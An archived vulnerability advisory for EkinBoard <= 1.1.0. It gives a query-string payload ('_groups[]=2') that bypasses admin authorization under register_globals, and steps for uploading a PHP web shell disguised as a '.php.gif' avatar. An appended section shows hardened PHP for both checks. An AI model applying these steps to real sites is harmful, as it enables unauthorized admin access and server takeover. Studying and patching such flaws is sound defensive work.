
EkinBoard <= 1.1.0 Remote File Upload / Auth Bypass Vulnerabilities

07 Jan 2008 00:00:00 | Reported by Eugene Minaev | Type: zdt | Source: 0day.today

===================================================================
EkinBoard <= 1.1.0 Remote File Upload / Auth Bypass Vulnerabilities
===================================================================



----[ EkinBoard Remote File Upload / Auth Bypass ... ITDefence.ru Antichat.ru ]

							EkinBoard >= 1.1.0 Remote File Upload / Auth Bypass
							
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
		Admin authorization can be bypassed if register_globals is on. Every admin panel script includes this code:
		
		<?php
		if(!in_array(2, $_groups)){
		die("<center><span class=red>You need to be an admin to access this page!</span></center>");
		} 
		?>
		
		test1.ru/skvoznoy/backup.php?_groups[]=2
		
		There is a bug in the upload function: any file can be uploaded, bypassing the filters. Name your shell like
		file.php.gif and select it as your avatar. Then check uploaded/avatars/filename_your_id.php

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]



#  0day.today [2018-03-19]  #
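
Added example, not part of the original advisory or EkinBoard's own code: a hardened form of the two checks described above. The group list is read only from server-side session state, so a request parameter such as `_groups[]` cannot populate it, and the avatar is stored under a server-chosen name whose extension comes from the detected image type rather than from the uploaded filename. The function names, the `$_SESSION['groups']` key and the `$destDir` parameter are assumptions for illustration.

```php
<?php
// Added example (not EkinBoard code). Function names, the session key and
// the destination directory parameter are assumptions.

// Admin check: read group membership from the session only, never from a
// bare global that register_globals could fill from the query string.
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $groups = $_SESSION['groups'] ?? [];   // assumed key, integer group ids
    if (!is_array($groups) || !in_array(2, $groups, true)) {
        http_response_code(403);
        exit('You need to be an admin to access this page!');
    }
}

// Avatar upload: ignore the client-supplied name entirely. The stored
// extension is derived from the detected image type, so "file.php.gif"
// can never end up on disk with a .php extension.
function store_avatar(array $file, int $userId, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed');
    }
    $allowed = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];
    $info = @getimagesize($file['tmp_name']);   // false if not an image
    if ($info === false || !isset($allowed[$info[2]])) {
        throw new RuntimeException('Not an allowed image type');
    }
    $target = rtrim($destDir, '/') . '/' . $userId . '.' . $allowed[$info[2]];
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store avatar');
    }
    return $target;
}
```

A file that passes the image check can still carry embedded script text, so the avatars directory should also be served with script execution disabled. register_globals was removed in PHP 5.4; on older runtimes it should be set to off.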
